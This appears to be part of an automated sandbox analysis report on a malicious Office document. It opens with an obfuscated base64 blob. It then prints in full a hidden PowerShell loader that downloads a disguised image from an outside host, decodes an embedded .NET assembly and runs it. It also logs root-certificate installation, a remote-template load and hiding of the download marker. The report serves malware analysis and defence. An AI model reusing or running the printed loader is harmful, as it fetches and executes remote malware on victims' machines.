eGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000E9247 RtlDeleteCriticalSection,RtlDeleteCriticalSection,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

18_2_000E9247

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_002F5893 push ebx; iretd	8_2_002F5894
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_002FF7C1 push edi; iretd	8_2_002FF7C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040134A pushfd ; retf	13_2_00401353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004012F2 pushfd ; retf	13_2_004012F3
Source: C:\Windows\explorer.exe	Code function: 19_2_0006A055 push es; iretd	19_2_0006A05D
Source: C:\Windows\explorer.exe	Code function: 19_2_00061405 push esi; ret	19_2_00061407
Source: C:\Windows\explorer.exe	Code function: 19_2_000647A7 push esp; iretd	19_2_000647A8
Source: C:\Windows\explorer.exe	Code function: 19_2_000614D4 push esi; ret	19_2_000614D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_000838A7 push esp; iretd	21_2_000838A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0008967E push ds; retf	21_2_00089680
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_000894E6 push edx; ret	21_2_000894E7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000887CE push es; ret	22_2_00088A18
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00088EEF push edi; ret	22_2_00088EF0
Source: C:\Windows\explorer.exe	Code function: 23_2_000E1405 push esi; ret	23_2_000E1407
Source: C:\Windows\explorer.exe	Code function: 23_2_000E14D4 push esi; ret	23_2_000E14D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_00083417 push esp; iretd	24_2_00083418
Source: C:\Windows\explorer.exe	Code function: 25_2_000E1405 push esi; ret	25_2_000E1407
Source: C:\Windows\explorer.exe	Code function: 25_2_000E45A7 push esp; iretd	25_2_000E45A8
Source: C:\Windows\explorer.exe	Code function: 25_2_000E14D4 push esi; ret	25_2_000E14D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 28_2_000C3627 push esp; iretd	28_2_000C3628
Source: C:\Windows\explorer.exe	Code function: 29_2_0006AC8D push esp; iretd	29_2_0006AC95
Source: C:\Windows\explorer.exe	Code function: 29_2_0006AAD2 push ebp; iretd	29_2_0006AAD3
Source: C:\Windows\explorer.exe	Code function: 29_2_00061405 push esi; ret	29_2_00061407
Source: C:\Windows\explorer.exe	Code function: 29_2_000614D4 push esi; ret	29_2_000614D6

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\z2.ink\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\z2.ink\DavWWWRoot			Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rugtucw

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rugtucw

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\rugtucw:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

22_2_00083862

Source: C:\Windows\SysWOW64\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
